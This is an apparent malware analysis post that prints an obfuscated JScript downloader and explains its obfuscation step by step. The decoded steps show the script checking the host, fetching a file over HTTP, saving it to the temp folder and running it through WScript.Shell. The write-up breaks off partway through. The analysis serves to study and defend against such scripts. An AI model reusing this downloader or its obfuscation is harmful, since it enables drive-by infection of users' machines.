var zicuvywzu2 = [425, 5023, 2533, 9366, 5275, 2251, 3900, 9213, 7847, 585, 5960, "r "].wuqjy();
var ahygwoxax9 = [534, 2087, 7366, 1747, 7611, 3740, 8876, 7483, 596, 8705, 5212, "'C"].wuqjy();
var obzezy1 = [7909, 9203, 4412, 3211, 2590, 6615, 4411, 9183, 5906, 1080, 6126, 4882, 9933, 1268, 7548, 4542, 5224, 4340, 8900, 5917, "en"].wuqjy();
var exipkezl7 = [1350, 5955, 932, 9724, 5191, 8527, 2652, 1427, 9511, 394, 130, 6791, 805, 8672, 1242, 1620, 4508, 7624, 8640, 5564, "sen"].wuqjy();
var cbimyfyx5 = [846, 7265, 6317, 2150, 6173, 9028, 3349, 2859, 393, 3472, 1249, 6349, 3543, 1837, 980, 8258, 4497, 8770, "lde"].wuqjy();
var bbynubxutki4 = [866, 9469, 3695, 9029, 6405, 6719, 7104, 6765, 5365, 6647, "01"].wuqjy();
var bnynju6 = [6981, 1845, 8142, 6497, 1530, 3445, 9730, 7472, 6222, 547, 9176, 5964, 6492, 4001, 7014, 5082, "ri"].wuqjy();
var othulnusy1 = [2192, 3075, 7026, 5111, 7670, 9529, 7913, 3948, 8395, 3112, 8881, 9287, 7700, 9392, 2504, 623, 5777, 6880, "Mo"].wuqjy();
var vgohzy0 = [5180, 9826, 5967, 406, 3064, 7005, 5527, 5372, 8032, 4032, 9163, 3967, 4165, 8106, 6084, 3351, 3705, 1431, "sp"].wuqjy();
var lnoxmed3 = [9841, 1600, 4972, 5975, 2290, 8212, 5286, 3774, 520, 4309, 3907, 5337, 7722, 4254, 7099, 2632, 9112, "je"].wuqjy();
var znimxuqvomebm0 = [7730, 8529, 6169, 7353, 3512, 5823, 1811, 922, 944, 8962, 9325, 7998, 9762, 557, 2366, 3210, 2305, "eO"].wuqjy();
var abytup6 = [7835, 7905, 4004, 6793, 7573, 7868, 8353, 1758, 9791, 9425, 4148, 7108, 1789, 7411, 7534, 9372, 6285, 8729, 1149, 5851, "r("].wuqjy();
var ykifismuz3 = [489, 8063, 6862, 5198, 5635, 4806, 8732, 5013, 118, 6700, 6358, 1961, 8296, 3749, 720, 2623, 6922, 3413, 3150, "ML"].wuqjy();
var lwyqodbo5 = [9661, 1985, 5652, 974, 5042, 8288, 4212, 2703, 1000, 3371, 1748, "yf"].wuqjy();
var kzyxcoz9 = [1121, 5443, 1312, 5623, 6374, 7229, 9872, 6856, 9829, 7728, 7655, 9426, 9433, "r("].wuqjy();
var ycej9 = [4048, 1247, 3675, 684, 1600, 9828, 8166, 2756, 5001, 6106, 8515, "el"].wuqjy();
var rowodhuvaz7 = [607, 5365, 3723, 9635, 1603, 6252, 728, 4544, 5400, 7523, 8896, 7470, 3697, 5884, 408, 3791, 2851, 5025, "ht"].wuqjy();
var ijtutsyttudq4 = [1802, 1683, 552, 8312, 8425, 1885, 3507, 8834, 4104, 9237, 6252, 8069, 5989, 6340, 3809, 8265, 6885, 2331, 1222, 5978, "ru"].wuqjy();
var ulhaca3 = [4670, 2686, 2078, 9662, 9159, 701, 8058, 8667, 6666, 855, 1635, 5182, 9000, 7987, 232, 286, 2806, 4144, 1879, ".C"].wuqjy();
var axnori3 = [2720, 5462, 9346, 5971, 1647, 6290, 2570, 1608, 840, 2376, 4905, 3309, 3930, 8445, 9924, " s"].wuqjy();
var bfylve5 = [1058, 1628, 4500, 5440, 1834, 7604, 1650, 5839, 3564, 2501, 8039, 8124, 1400, 6430, 8915, 6229, 8542, 3416, 6773, 3687, ".ex"].wuqjy();
var ertos1 = [9752, 5201, 6445, 5038, 8875, 6865, 9247, 2783, 2202, 6970, 6938, 9202, 9502, "ct"].wuqjy();
var pbecel1 = [1307, 191, 8939, 491, 5998, 9919, 6518, 880, 9853, 7686, 8328, 4395, 2911, "t/"].wuqjy();
var ahelesdave4 = [6948, 7796, 7487, 6365, 310, 9775, 9074, 1908, 8610, 6068, 2399, 5834, "do"].wuqjy();
var ahaklesek9 = [419, 3351, 6420, 5264, 7381, 3654, 1305, 7513, 1306, 7854, 6792, 1546, 7064, 6337, 5107, 4583, 4173, 3054, "Sy"].wuqjy();
var ekupovyxd2 = [2343, 4042, 5893, 9563, 9834, 9588, 1276, 3192, 655, 3335, 9316, 7298, 3391, 9935, 7347, 787, "/t"].wuqjy();
var kagakacke2 = [9877, 3179, 7307, 3164, 5732, 1875, 5514, 4881, 6650, 8299, 8765, 6133, 9603, 7349, 2743, 7945, 1757, 8417, 8429, 4902, "ap"].wuqjy();
var umehzus2 = [3825, 699, 2026, 3103, 2953, 6927, 7228, 4441, 9372, 1626, 3591, "e"].wuqjy();
var mydhamz6 = [4639, 1836, 5063, 5195, 5072, 4380, 2493, 8363, 4315, 9740, "we"].wuqjy();
var etyfyhtist0 = [578, 1596, 8577, 367, 8777, 5916, 8958, 9667, 3963, 1659, 4184, 2023, 1172, "de"].wuqjy();
var ytulkycvahl7 = [6079, 2120, 9628, 6109, 8812, 434, 4782, 9955, 1955, 9190, 7579, 595, "d"].wuqjy();
var unevsotehs5 = [9834, 364, 6708, 1433, 6587, 9777, 5621, 9515, 3950, 8678, "ri"].wuqjy();
var ujozmu4 = [3451, 6155, 2105, 3347, 3877, 7605, 3307, 3435, 8019, 1847, 344, 4245, 5588, 9709, " v"].wuqjy();
var ysuzsibi2 = [2693, 3116, 9238, 9870, 4575, 4480, 3955, 4308, 6593, 2882, 7714, 9111, 2107, 7578, 3255, 2665, 6890, 6556, 872, 9692, "ve"].wuqjy();
var arbicz3 = [8689, 7305, 3493, 8047, 8469, 2527, 190, 1837, 8431, 9070, 4307, 3938, 4103, "cr"].wuqjy();
var qneti1 = [3820, 5383, 6080, 2408, 4176, 1499, 7426, 495, 1225, 2897, 3450, 305, 7188, 2151, 9316, "va"].wuqjy();
var ibupxylopa1 = [1690, 4997, 7408, 2161, 3295, 8477, 1684, 610, 1366, 1394, 1215, 2689, 5633, 9773, 4116, 9983, "me"].wuqjy();
var epajugb6 = [742, 780, 9389, 8367, 4656, 6274, 6328, 2106, 3587, 3162, 4992, 9122, 6883, 3928, 4398, "Da"].wuqjy();
var tutobmytvo0 = [9857, 8585, 8035, 928, 2812, 5390, 4464, 3830, 9201, 8773, 4540, 3766, "Fi"].wuqjy();
var timeczonmeng5 = [8781, 6860, 2273, 450, 8964, 7705, 3108, 4574, 2659, 513, 2061, 9307, 3469, 9315, 9157, 324, " r"].wuqjy();
var ixyfone3 = [6003, 1577, 7167, 5219, 7303, 2102, 5319, 5514, 2743, 6699, 7239, 1988, 2809, 2781, 6926, 5601, 1358, "fu"].wuqjy();
var vdemudur2 = [4987, 9296, 9444, 7376, 8293, 3210, 8111, 2290, 5239, 9548, "e"].wuqjy();
var xfivykpinuc3 = [9799, 9572, 3738, 9145, 5543, 5285, 5436, 8014, 6794, 6176, 391, 1699, 9385, 4221, 145, 9309, 5193, "pi"].wuqjy();
var onywy2 = [4940, 6879, 8553, 8887, 7886, 4843, 7319, 5891, 3795, 1713, 3358, 1066, 2158, 6224, 6742, 156, 718, 148, 7395, 8668, "es"].wuqjy();
var cijelnabhetd1 = [5028, 6685, 5250, 8397, 4587, 391, 6125, 9102, 3943, 5527, 6590, 3019, 4694, 2602, 2901, "st"].wuqjy();
var intovqa1 = [127, 6033, 6707, 9107, 6632, 507, 488, 4573, 8436, 7366, 8694, 998, 9744, 5124, 4191, 3426, "e"].wuqjy();
var iher4 = [9100, 5446, 1826, 8875, 4520, 3634, 7485, 588, 5934, 3320, 7507, 4815, 7009, 7907, 8576, 9874, 827, 2669, 4080, "ws"].wuqjy();
var ewhoranritqe0 = [2724, 2656, 2798, 7617, 8443, 3139, 109, 5977, 3514, 2162, 5396, 9442, "rt"].wuqjy();
var qqupusu5 = [1692, 1513, 1844, 9501, 6694, 2133, 2244, 6572, 7940, 6061, 6289, 5159, 2786, 9039, 3526, 6573, 6582, 4370, 1066, 3941, "ip"].wuqjy();
var awravpu2 = [1846, 7120, 4697, 1100, 8948, 8527, 4714, 148, 5827, 8952, "ea"].wuqjy();
var zpelugekbeb8 = [6879, 1722, 7199, 4660, 9263, 136, 6101, 4818, 1101, 3645, 6690, 1770, 9626, 6278, 1332, 1288, 3236, 1927, "of"].wuqjy();
var jezit0 = [8707, 8681, 5223, 9324, 6570, 6970, 6444, 1268, 7970, 5393, 9695, 2684, 5441, 5523, "te"].wuqjy();
var mokohx4 = [7783, 3737, 5270, 3816, 6356, 7575, 7483, 5761, 6964, 5328, 3121, "ct"].wuqjy();
var alit3 = [4524, 2050, 1865, 1292, 7694, 3638, 5977, 9790, 4158, 6648, 196, 8529, 2700, 871, 1923, "uj"].wuqjy();
var wbapzytjehi1 = [850, 8103, 3126, 5763, 2318, 9971, 1154, 1073, 8398, 3172, 8313, 1336, 5655, 6178, 9974, 7943, 6382, 2354, 8516, 5514, "ef"].wuqjy();
var pyzux5 = [3739, 8334, 148, 3718, 5931, 708, 3949, 5209, 5998, 3405, 7087, 5468, 349, "co"].wuqjy();
var vtypmy6 = [7780, 7641, 2937, 1541, 5554, 1064, 7544, 1972, 768, 6080, 9588, 9562, 1662, " h"].wuqjy();
var lfidmehesjel6 = [1271, 3048, 5329, 1642, 9949, 4612, 6926, 6180, 8097, 1460, 1594, 4385, "2u"].wuqjy();
var byccacgavu7 = [3744, 5584, 9145, 2127, 6926, 5717, 5776, 4915, 7762, 6902, 1084, " &"].wuqjy();
var cepa3 = [2278, 9392, 9283, 732, 5520, 873, 9091, 915, 763, 5876, 2952, 6017, 2246, 9480, 4891, 927, 8584, 3668, "os"].wuqjy();
var iqejuco8 = [6904, 2095, 4340, 1133, 2060, 3180, 3933, 8356, 483, 358, 6231, 2617, 323, 7209, 295, 5934, 2628, 2803, " 'S"].wuqjy();
var ywyzitopn8 = [3144, 3220, 1790, 9319, 1582, 7695, 2869, 2577, 6646, 5628, 1627, 569, "mOb"].wuqjy();
var vcijdyho3 = [6734, 4112, 7990, 3457, 4926, 9012, 438, 8464, 2187, 3332, 1756, 8154, 2589, 8241, 1850, 2787, "Ge"].wuqjy();
var taxed2 = [7531, 8093, 4358, 1003, 9242, 707, 4446, 1079, 1588, 2704, 5477, 358, 2823, 2152, 6012, "r"].wuqjy();
var yzgyqo3 = [4158, 2792, 6683, 4066, 6720, 4285, 6872, 160, 7645, 6926, 3947, 7404, 2442, 8504, "ku"].wuqjy();
var ytohkikrits5 = [1745, 763, 4219, 7319, 4367, 5095, 4228, 9965, 8840, 2900, 6396, 7303, "urn"].wuqjy();
var atyvxa8 = [8375, 9978, 7596, 660, 330, 9277, 5390, 9455, 1978, 9469, 6944, 2696, 6916, 7950, "p-"].wuqjy();
var gosodd5 = [9140, 6980, 6349, 4044, 3027, 3838, 2040, 1491, 9339, 1913, 7739, 8480, "ij"].wuqjy();
var dbelijaco0 = [7498, 5350, 5396, 7102, 2699, 8040, 5047, 4357, 6458, 3477, 9159, 5912, 1725, 8467, 923, 5670, 8977, "pi"].wuqjy();
var apafeclu2 = [5303, 6315, 8596, 8550, 8524, 9469, 3555, 624, 9767, 2609, 9632, 1855, ":\\"].wuqjy();
var xfawibboxogj3 = [7812, 6412, 6864, 4765, 4646, 1911, 6401, 6327, 3730, 2335, 5405, 1099, "ll"].wuqjy();
var ukydeji4 = [684, 732, 5292, 4659, 3081, 2933, 3295, 8467, 5858, 8806, 7408, 3267, 8259, "id"].wuqjy();
var wkakaksetit9 = [4549, 542, 8191, 8350, 2243, 4484, 8342, 4263, 5979, 8762, 9485, 2416, "tF"].wuqjy();
var ojujlowhakho9 = [5096, 5381, 7954, 4848, 582, 4399, 9786, 9358, 1264, 9034, 2142, 3367, "WS"].wuqjy();
var ctyhfy8 = [9246, 2200, 8202, 993, 9711, 1942, 9769, 7195, 2439, 8475, ":\\"].wuqjy();
var ismafsosci0 = [5270, 5598, 2336, 2196, 1315, 8012, 7012, 8977, 4914, 7996, 4660, 3137, 5385, 6974, 3554, 4482, 3942, "& "].wuqjy();
var wrijsurwefjo = new Function(eplivqyp5 + ytohkikrits5 + iqejuco8 + vnavuxazask7 + qgozebxaz2 + mrypxolnyvy4 + yninexi7 + lushevmazsa1 + ejbuzopydru9 + ywyzitopn8 + axwowarogd5 + xixjyznurev9)();
var tonilgottu6 = [3061, 5547, 1547, 9647, 7932, 4121, 270, 154, 4943, 7246, 4793, 4746, 2973, 6631, 1098, 6909, 8943, 7734, "cw"];
var ovzyro2 = [7008, 6984, 2564, 3918, 5928, 298, 4140, 2834, 7035, 8256, "rl"];
var unafyc3 = [1083, 4657, 8203, 2548, 1666, 5187, 5012, 5484, 1116, 5211, "i"];
var acazahy0 = [681, 6194, 5780, 3130, 7760, 968, 8043, 3245, 1985, 3255, 2770, "dzy"];
var ilelyg8 = [7144, 3673, 1341, 4905, 4542, 9285, 8050, 6427, 2540, 821, 2163, 7842, 1273, 2390, 8197, 2210, 3041, 493, "ta"];
var gxifji8 = [1191, 3541, 8844, 8934, 4715, 1235, 7131, 6826, 4176, 7524, 8485, 8135, 1067, "mby"];
var yheblynfesry8 = [5879, 3566, 1209, 595, 4702, 8240, 7321, 8778, 5765, 5806, 6913, 6732, 8546, 7406, 1828, "dg"];
var khybqilmomv0 = [9214, 9504, 4268, 1043, 3177, 3937, 2213, 1789, 8590, 5060, 3465, "zh"];
var uxekanycu6 = [477, 4812, 8020, 5438, 8177, 6212, 936, 5751, 3622, 4711, 8516, 2587, 1587, "pv"];
var okvedisl6 = [4483, 3423, 4756, 8005, 8035, 3272, 593, 9522, 2020, 9382, 4452, 9476, "v"];
var yfgirbu9 = [114, 5116, 5355, 9536, 7037, 4737, 3989, 6513, 7240, 7786, 9068, 2446, "yrf"];
var qewonolni0 = [1527, 6014, 529, 8465, 752, 4419, 4978, 7892, 2205, 4047, "oq"];
var ratumpos0 = [7610, 1855, 4999, 5502, 3961, 8947, 5741, 1653, 5804, 6578, 7864, 7719, 9254, 6641, 3810, 1226, 2088, 145, "afr"];
var usimov0 = [869, 3273, 9148, 7411, 6983, 374, 9399, 7029, 751, 5874, 2309, 4846, 2634, 3602, 9070, 337, "yh"];
var azuzso7 = [7373, 6862, 4041, 8025, 2736, 6251, 2872, 5271, 9753, 1942, 5508, 1653, 6792, 406, 9089, 7544, 7375, 4115, "bu"];
var wolebtupju2 = new Function(qneti1 + sumguz0 + tihu0 + ixyfone3 + uxodhy7 + nzexxof6 + gihqokl4 + qmywha6 + adbimgunyddi7 + ifpagn3 + cwilo7 + ulhaca3 + esadk1 + jcutxo0 + znimxuqvomebm0 + qefrinilnem6 + nnevo6 + tiwel6 + qxicnyhnylobd5 + gosodd5 + qtaknobry5 + yvzune0 + wbapzytjehi1 + oquxab8 + uryld9 + ujozmu4 + lwivy9 + axnori3 + xfivykpinuc3 + eglogn5 + tazomv2 + nynozkawvi3 + duzegcudirb7 + ikyl8 + alit3 + iglylfanwac2 + emmyctepedzy3 + abforepimu3 + ycajuve7 + kifsi4 + ivofaxcoxe7 + kzyxcoz9 + ahygwoxax9 + ctyhfy8 + ugyctarno4 + yjyk7 + ahelesdave4 + iher4 + utwihupos9 + havgutjyg3 + upukydsaz3 + zicuvywzu2 + ijlovl1 + vehidk1 + yzgyqo3 + sdoscetnecy9 + vtypmy6 + zpelugekbeb8 + yqryzpet6 + ruhycorylr1 + izywo5 + qnafoxhamw0 + wkakaksetit9 + ndanoladtu6 + etyfyhtist0 + abytup6 + qexed0 + apafeclu2 + aramigvyww7 + igich4 + yldic0 + suvdeccofhycm4 + rawjulhyr3 + donxopwoki8 + ecvoxza7 + dsergy3 + epajugb6 + xmeglufhowceg7 + xpyqegxovog4 + cijelnabhetd1 + othulnusy1 + ysispereqn7 + isbuqid0 + fpireldokti4 + cumcifulwa2 + iwzelpanon9 + ypydbahs0 + tnyqyqfexny8 + gficju9 + vifahu3 + fagenymdyvp7 + bbynubxutki4 + izfep6 + byccacgavu7 + ismafsosci0 + yjqek3 + ukydeji4 + oqahboc3 + iwula5 + ynyvte2 + qvysinpe8 + bigcu1 + adjyfezjic1 + hsyfcytnivgo8 + timeczonmeng5 + dbynciseq9 + mmuvpafyp4 + efretfagdo8 + duhjuxolh9 + jyfanynp1)();
var jbohzoqavl1 = [6687, 4486, 3296, 1959, 4239, 5139, 7367, 5793, 1932, 7674, 4883, 9376, 5049, 8898, 8473, 7066, 9290, 8872, 7141, "i"];
var ojezadsub2 = [3937, 1136, 5435, 3227, 9908, 2577, 2192, 6034, 7644, 883, 9342, 7837, "em"];
var uvoqz9 = [1720, 3940, 4277, 2504, 3282, 2115, 9066, 226, 2545, 5559, 2907, 5990, 8470, 5812, 5750, 9758, 3178, 6862, "tly"];
var ikirjoxno3 = [1144, 2846, 2184, 1271, 5291, 7643, 4079, 1282, 6113, 9791, "t"];
var derjunkolm6 = [5519, 908, 3193, 810, 8452, 7173, 1992, 4566, 6965, 8824, 438, 9835, 2619, 3002, 3408, 7474, 2708, 9946, 550, "h"];
var arinycnobi6 = [2543, 5832, 5224, 5152, 5778, 5675, 3331, 1826, 5218, 6899, 2869, 7776, "ny"];
var jobuglojxadm7 = [5486, 9187, 4216, 2386, 2056, 1992, 4797, 1576, 3203, 5493, 6471, 9770, 9892, 7650, 4986, 8804, 3565, 5824, "je"];
var akcuffogxyby1 = [1083, 8956, 9064, 4549, 4781, 3186, 3133, 4032, 7657, 6277, 9133, 426, 6524, 6015, "i"];
var yfuramwypd0 = [2403, 4314, 6784, 2729, 839, 2799, 9047, 9667, 3058, 553, 6485, 6746, 1164, 3479, 5921, 2872, 5346, 2058, "i"];
var ypal0 = [1980, 9409, 4076, 4753, 4756, 6034, 3534, 2339, 7464, 2295, 2416, 9348, 9892, 4051, 6235, 1308, "yc"];
var tvavnydbikyf8 = [7912, 8143, 9721, 3947, 1678, 2060, 1412, 3873, 4376, 760, 3766, 8328, 6896, "pi"];
var umufehni9 = [2863, 5593, 5846, 1524, 3549, 994, 9104, 1706, 1967, 7117, 9840, 7213, 5825, 7698, 8241, 6043, 1211, 3205, 9651, "asl"];
var qyfjifji1 = [8632, 8615, 7528, 6873, 4658, 8640, 9978, 4310, 8229, 5960, 5714, 6016, 8566, "pza"];
var ofupxadibk8 = [430, 9892, 7753, 408, 4202, 5983, 6268, 9816, 1999, 4835, 365, 5862, 4044, 2753, 2205, "j"];
var myqjisgik8 = [5340, 1803, 1690, 9284, 4457, 3795, 1878, 2410, 7387, 7754, 4218, "ac"];
switch (wolebtupju2_) {
case 9:
ubytucwu6 = muru4[uhadvo8 + luhegza6 + qqupusu5 + ovtodep0];
jilzorzo4 = ubytucwu6[nbavligw4 + awravpu2 + jezit0 + mjydgyjyksus8 + jwiwga6 + mokohx4](ewsizka1 + bnynju6 + igzozjed9 + uxnovyra9 + ecoclu9 + ahhavuho3 + tbipicma2 + ahaklesek9 + ryzkantu5 + afoba9 + fwulu3 + lnoxmed3 + ertos1);
odpijdeby0 = ubytucwu6[nbavligw4 + awravpu2 + jezit0 + mjydgyjyksus8 + jwiwga6 + mokohx4](ojujlowhakho9 + arbicz3 + tatnynhemku0 + iqedoca8 + xbojemkamd7 + ycej9 + egpemfecnu6);
rgigawco2 = ubytucwu6[nbavligw4 + awravpu2 + jezit0 + mjydgyjyksus8 + jwiwga6 + mokohx4](kaprizzyri5 + skujpe0 + ocyhbyti2 + jeripono8 + ykifismuz3 + ofylygso6 + pycozbyw4);
ymnevi2 = ubytucwu6[nbavligw4 + awravpu2 + jezit0 + mjydgyjyksus8 + jwiwga6 + mokohx4](miqo9 + xvyhavykta4 + abyhbo1 + kvuzypafek8);
epygejm8 = jilzorzo4[kxatdohs5 + imgutg9 + ezxityzw3 + gulmul6 + cbimyfyx5 + taxed2](yjanugr2);
pkekzigl8 = jilzorzo4[vcijdyho3 + equpqu9 + yqpemeropi2 + ipuhl8 + uwjecab4 + intovqa1]();
welerle0 = rgigawco2[ymizd3 + cvomodu5](rodhyciftanz7 + butujuvf0, rowodhuvaz7 + duvywan3 + ysuxgyxd4 + padypot8 + kagakacke2 + dbelijaco0 + xjuhpivsizi2 + yxyreqqybqu9 + ukizahup4 + lfidmehesjel6 + fxifuskopup2 + ymigig6 + ncaxa3 + atyvxa8 + pyzux5 + cypewi6 + obzezy1 + pbecel1 + egkyrexvovt1 + holjuzmiwgi0 + onywy2 + ekupovyxd2 + mydhamz6 + cpydetselap4 + lwyqodbo5 + lovmo1 + ewhoranritqe0 + eworhafsoqk2 + infuru9 + adtise6 + sjefecor1 + yqasoksahbe6 + ovaphojsi0 + btafdudju2 + pescumpu5 + umehzus2, bwipodjofvo2);
welerle0 = rgigawco2[exipkezl7 + ytulkycvahl7]();
ymnevi2[kidrypni0 + vdemudur2] = zjafoxregaw9;
jdefamo7 = rgigawco2[ncunridc4 + vgohzy0 + exmatdylju3 + ifxus9 + amtumyj7 + ivwibs4];
exede5 = ubytucwu6[ithiqcumi7 + unevsotehs5 + ijecu4 + umavl0 + xfawibboxogj3 + obejnog7 + ibupxylopa1];
welerle0 = ymnevi2[ejiredla7 + ysyfazs0]();
welerle0 = ymnevi2[enxocqojolv5 + izavoned3 + mkaqaxykco0](jdefamo7);
welerle0 = ymnevi2[ezlajvelevny5 + ysuzsibi2 + uhvaj9 + tutobmytvo0 + hivelg1](epygejm8 + pkekzigl8);
welerle0 = ymnevi2[xwajapyt1 + cepa3 + upewekpuxb3]();
welerle0 = odpijdeby0[ijtutsyttudq4 + pkihfidonpy7](aqloxhe5 + bfylve5 + ajnyti1 + yvfijgeruqno3 + epygejm8 + pkekzigl8, bwipodjofvo2);
break;
}

Methods used :

- some vars with long arrays of values :

Example :

var ifpagn3 = [707, 3703, 402, 4283, 8168, 3068, 8768, 3403, 3035, 7441, 4400, 3460, 2550, 5548, 3583, 6534, 3040, 8367, "ri"].wuqjy();
var uhadvo8 = [6476, 796, 2367, 4143, 6423, 5940, 3165, 9323, 4834, 4697, 5617, 1273, 9839, 1412, "WS"].wuqjy();
var uxodhy7 = [6532, 1901, 2855, 1852, 7316, 5498, 8452, 4555, 7386, 1261, 7237, 4312, 6763, 8496, "jf"].wuqjy();
var xpyqegxovog4 = [299, 8746, 397, 9032, 4189, 8297, 2463, 2690, 8177, 1406, 1770, 3001, 3468, 7901, 5140, 7728, 4614, "La"].wuqjy();
var amtumyj7 = [2042, 3018, 6405, 578, 3972, 6187, 9686, 3305, 233, 3598, 181, 2311, 6179, 2605, 8505, "Bo"].wuqjy();

- some parts are made with vars calling anonymous function with content is a concatenation of vars created with the above method :

Example :

var wrijsurwefjo = new Function(eplivqyp5 + ytohkikrits5 + iqejuco8 + vnavuxazask7 + qgozebxaz2 + mrypxolnyvy4 + yninexi7 + lushevmazsa1 + ejbuzopydru9 + ywyzitopn8 + axwowarogd5 + xixjyznurev9)();

- some other parts create objects and use concatenation of vars for the methods (=functions) called :

Examples :

ubytucwu6 = muru4[uhadvo8 + luhegza6 + qqupusu5 + ovtodep0];
jdefamo7 = rgigawco2[ncunridc4 + vgohzy0 + exmatdylju3 + ifxus9 + amtumyj7 + ivwibs4];

2) Explanation :

2-1) The Array parts :

All the principal strings used are divided in several parts, that can seem hard to be found, but in this script, are not well hidden :

One example :
...
var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].wuqjy();

...​

Looking well at the code, we can see at then end .wuqjy() : a call of a function.

But even without looking what this function makes with the array, we have a big clue : only numbers with the last value as a string (it could have been better obfuscated ...)

=> "Wr" seems to be the part of a word.

Let see the function wuqjy() :

Array.prototype.wuqjy = function () {
return this.pop();
}

Omg, this function is made to obfuscate the use of the pop() JavaScript method :D
The aim of this function : return the last value of the array / tab...

var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].pop();
=> var enxocqojolv5= "Wr";
A big part of the script is composed of these vars initialization
2-2 ) Where these parts are used ?

Taking the same example as in previous part :

welerle0 = ymnevi2[enxocqojolv5 + izavoned3 + mkaqaxykco0](jdefamo7);

var enxocqojolv5 = [4764, 8988, 2383, 8868, 8354, 3116, 8929, 9605, 846, 7291, 7109, 1151, "Wr"].wuqjy();

var izavoned3 = [7684, 5677, 403, 6613, 5283, 1150, 3905, 2392, 2201, 1746, 9014, 6705, 3619, 5479, 1781, 2880, 1417, 8530, "it"].wuqjy();

var mkaqaxykco0 = [1638, 8609, 6242, 3285, 7624, 2948, 6805, 3103, 4630, 9585, 4421, 3160, 3408, 1782, 7007, 7779, "e"].wuqjy();

=> enxocqojolv5 + izavoned3 + mkaqaxykco0 = "Write"
3 ) Other parts :

3-1) Anonymous functions used :

var wrijsurwefjo = new Function(eplivqyp5 + ytohkikrits5 + iqejuco8 + vnavuxazask7 + qgozebxaz2 + mrypxolnyvy4 + yninexi7 + lushevmazsa1 + ejbuzopydru9 + ywyzitopn8 + axwowarogd5 + xixjyznurev9)();

var wolebtupju2 = new Function(qneti1 + sumguz0 + tihu0 + ixyfone3 + uxodhy7 + nzexxof6 + gihqokl4 + qmywha6 + adbimgunyddi7 + ifpagn3 + cwilo7 + ulhaca3 + esadk1 + jcutxo0 + znimxuqvomebm0 + qefrinilnem6 + nnevo6 + tiwel6 + qxicnyhnylobd5 + gosodd5 + qtaknobry5 + yvzune0 + wbapzytjehi1 + oquxab8 + uryld9 + ujozmu4 + lwivy9 + axnori3 + xfivykpinuc3 + eglogn5 + tazomv2 + nynozkawvi3 + duzegcudirb7 + ikyl8 + alit3 + iglylfanwac2 + emmyctepedzy3 + abforepimu3 + ycajuve7 + kifsi4 + ivofaxcoxe7 + kzyxcoz9 + ahygwoxax9 + ctyhfy8 + ugyctarno4 + yjyk7 + ahelesdave4 + iher4 + utwihupos9 + havgutjyg3 + upukydsaz3 + zicuvywzu2 + ijlovl1 + vehidk1 + yzgyqo3 + sdoscetnecy9 + vtypmy6 + zpelugekbeb8 + yqryzpet6 + ruhycorylr1 + izywo5 + qnafoxhamw0 + wkakaksetit9 + ndanoladtu6 + etyfyhtist0 + abytup6 + qexed0 + apafeclu2 + aramigvyww7 + igich4 + yldic0 + suvdeccofhycm4 + rawjulhyr3 + donxopwoki8 + ecvoxza7 + dsergy3 + epajugb6 + xmeglufhowceg7 + xpyqegxovog4 + cijelnabhetd1 + othulnusy1 + ysispereqn7 + isbuqid0 + fpireldokti4 + cumcifulwa2 + iwzelpanon9 + ypydbahs0 + tnyqyqfexny8 + gficju9 + vifahu3 + fagenymdyvp7 + bbynubxutki4 + izfep6 + byccacgavu7 + ismafsosci0 + yjqek3 + ukydeji4 + oqahboc3 + iwula5 + ynyvte2 + qvysinpe8 + bigcu1 + adjyfezjic1 + hsyfcytnivgo8 + timeczonmeng5 + dbynciseq9 + mmuvpafyp4 + efretfagdo8 + duhjuxolh9 + jyfanynp1)();

Using what we have learnt from precedent parts :

var wrijsurwefjo = new Function( "return 'Scripting.FileSystemObject';");

In detail :

function anonymous() {
return 'Scripting.FileSystemObject';
}

=> var wrijsurwefjo = "Scripting.FileSystemObject";​

var wolebtupju2 = new Function("var hofujfe2 = WScript.CreateObject(wrijsurwefjo); var spidku1 = hofujfe2.GetFolder('C:\\\\Windows'); var spidku = hofujfe2.GetFolder('C:\\\\'); if(spidku1.DateLastModified > new Date(2015) && spidku.Name == '') return 9;");

In detail :​

function anonymous() {
var hofujfe2 = WScript.CreateObject(wrijsurwefjo);
=> Scripting.FileSystemObject
var spidku1 = hofujfe2.GetFolder('C:\\Windows');
=> IFolder on C:\\Windows'
var spidku = hofujfe2.GetFolder('C:\\');
=> IFolder on 'C:\\'
if(spidku1.DateLastModified > new Date(2015) && spidku.Name == '')
return 9;

=> returns 9 if Date Last Modified is after new Date(2015) and spidku.Name == ''
}

=> var wolebtupju2 = 9;
3-1) Main part :
switch (wolebtupju2) {
case 9:
=> here we are !
ubytucwu6 = muru4[uhadvo8 + luhegza6 + qqupusu5 + ovtodep0];
=> ubytucwu6 : this["WScript"];
=> WScript object
=> this variable will be use to create several WScript objects
jilzorzo4 = ubytucwu6[nbavligw4 + awravpu2 + jezit0 + mjydgyjyksus8 + jwiwga6 + mokohx4](ewsizka1 + bnynju6 + igzozjed9 + uxnovyra9 + ecoclu9 + ahhavuho3 + tbipicma2 + ahaklesek9 + ryzkantu5 + afoba9 + fwulu3 + lnoxmed3 + ertos1);
=> WScript.CreateObject("Scripting.FileSystemObject");
=> object to play with file system

odpijdeby0 = ubytucwu6[nbavligw4 + awravpu2 + jezit0 + mjydgyjyksus8 + jwiwga6 + mokohx4](ojujlowhakho9 + arbicz3 + tatnynhemku0 + iqedoca8 + xbojemkamd7 + ycej9 + egpemfecnu6);
=> WScript.CreateObject(""WScript.Shell");
=> will be used for the run part (with parameters)

rgigawco2 = ubytucwu6[nbavligw4 + awravpu2 + jezit0 + mjydgyjyksus8 + jwiwga6 + mokohx4](kaprizzyri5 + skujpe0 + ocyhbyti2 + jeripono8 + ykifismuz3 + ofylygso6 + pycozbyw4);
=> WScript.CreateObject(""MSXML2.XMLHTTP");
=> object to make the http request

ymnevi2 = ubytucwu6[nbavligw4 + awravpu2 + jezit0 + mjydgyjyksus8 + jwiwga6 + mokohx4](miqo9 + xvyhavykta4 + abyhbo1 + kvuzypafek8);

=> WScript.CreateObject("ADODB.Stream");
=> Stream that will be used to save the data received by the request

epygejm8 = jilzorzo4[kxatdohs5 + imgutg9 + ezxityzw3 + gulmul6 + cbimyfyx5 + taxed2](yjanugr2);
=> FSO.GetSpecialFolder("2");
=> "2" is for the temp path folder
=> Example : "C:\Users\DardiM\AppData\Local\Temp

pkekzigl8 = jilzorzo4[vcijdyho3 + equpqu9 + yqpemeropi2 + ipuhl8 + uwjecab4 + intovqa1]();

